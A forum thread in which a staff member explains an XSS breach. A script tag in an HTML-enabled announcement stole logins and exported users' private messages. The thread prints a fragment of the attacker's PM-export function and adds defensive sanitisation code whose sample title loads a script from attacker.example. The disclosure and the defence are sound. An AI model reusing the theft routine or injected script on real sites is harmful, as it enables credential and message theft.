Quote: We're looking into the logs to double-check.
The logs have been double checked. The compromised mod account has no activity for global announcements predating yesterday. And as far as we're aware no other mod accounts were compromised.
Quote: How many of the 141 are fixed?
All of the 141 were reset yesterday morning. I'm not quite sure what you mean by "fixed" beyond that.
It took a whole day and multiple requests for me.
My account is still locked, had to create a duplicate for the time being just to get PM access....
hope I can get this resolved soon
YGPM. Help is on the way.
Harvey
Senior AT Mod/Admin
Quote: I had to reset my password. So, was my account one of the ones compromised?
Yes.
Quote: A better question might be, how does a Mod account have enough privileges to create a script that runs for everyone logged in, without anyone even having to view the announcement to run the script?
The script was hosted on a 3rd party server. There was a Javascript <script> tag in the title of the announcement, and as HTML was turned on for that announcement, the tag was not escaped and dutifully executed by clients. This is a stock feature of vB.
Quote: Not to mention, how do Mod accounts (and not Admin accounts) have privs to read our PMs anyways?
Quote: I thought when Mosh was banned, they claimed that Mods hacked their account to read their PMs. So this breach announcement is telling us that any Mod account can simply read our PMs, that they are in fact not "private"?
Quote: And that some remote hacker did just that, and sucked up all of our PMs to some remote server?
The PMs weren't stolen by going through mod accounts. They were stolen by the script executing on client computers, which in turn triggered the PM export option for the user's account and then piped the output of that to the remote server.*
Quote: How long until Mod accounts (and higher) require two-factor authentication? (RSA key fobs, cell-phone callbacks, or fingerprint or other biometric authentication devices?)
We'll have to see what vB 5 brings us.
*The PM theft code in question
Code:
function getMessages() {
	// Runs in the logged-in user's browser, so the request is made with that user's own session.
	$.get(PATH_FORUM + '../private.php?do=downloadpm&dowhat=xml', function(data) {
		// Serialize the returned PM export and hand it to the script's upload routine.
		request({ type: TYPE_USER, messages: escape((new XMLSerializer()).serializeToString(data)) });
	});
}
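As an added example (not code from the forum or from vBulletin), the following contrasts the rendering mistake described in the post above, a stored announcement title inserted into every page with HTML enabled, with a defensive alternative: escape the title, then restore only an exact allowlist of attribute-less formatting tags. The sample title, the allowlist and the function names are assumptions.

```javascript
// Added example (not the forum's or vBulletin's code): rendering a global
// announcement title. The breach above came from a title that held a <script>
// tag and was inserted into every page unescaped because HTML was enabled.

const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Neutralise every HTML-significant character so the browser shows the title
// as text instead of parsing it as markup.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (c) => ESCAPES[c]);
}

// Formatting a mod may legitimately want in a title (assumed allowlist). Only
// the exact, attribute-less forms are restored, so nothing carrying src=,
// href= or on*= handlers can come back to life.
const ALLOWED_TAGS = ['b', 'i', 'u'];

// Escape first, then re-enable the allow-listed tags by matching their escaped
// literal text. Anything else, <script> included, stays inert.
function sanitizeTitle(title) {
  let out = escapeHtml(title);
  for (const tag of ALLOWED_TAGS) {
    out = out.split(`&lt;${tag}&gt;`).join(`<${tag}>`);
    out = out.split(`&lt;/${tag}&gt;`).join(`</${tag}>`);
  }
  return out;
}

// What the "HTML on" setting amounted to: the stored title inserted raw.
function renderUnsafe(title) {
  return `<div class="announcement">${title}</div>`;
}

function renderSafe(title) {
  return `<div class="announcement">${sanitizeTitle(title)}</div>`;
}

// Constructed sample title: legitimate formatting plus an external script tag.
const SAMPLE_TITLE =
  '<b>Forum maintenance</b> tonight <script src="https://attacker.example/pm.js"></script>';

// Crude check used here to show the difference: any script tag or inline
// event-handler attribute in the rendered HTML counts as executable markup.
function containsScript(html) {
  return /<script\b/i.test(html) || /\son\w+\s*=/i.test(html);
}

console.log(containsScript(renderUnsafe(SAMPLE_TITLE)), containsScript(renderSafe(SAMPLE_TITLE)));
```

The same escape-then-allowlist step belongs wherever a moderator-controlled string is rendered into pages other users see, not only in announcement titles.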
Quote: Were the passwords hashed or anything when taken? Or should we assume it was unencrypted when it was compromised? I changed my password anyways, but just curious regarding future security precautions...
It wasn't a DB hack, it was an XSS hack. They didn't touch our DB; passwords were exposed by embedding an XSS that copied down users' credentials as they entered them to log in. Which is why only 141 accounts were compromised.
Quote: Why would they take PMs if the only people who can read them are the owners?
They're exported as XML files and downloaded to the remote server. At which point the attacker can read them.
Quote: They're exported as XML files and downloaded to the remote server. At which point the attacker can read them.
Exactly.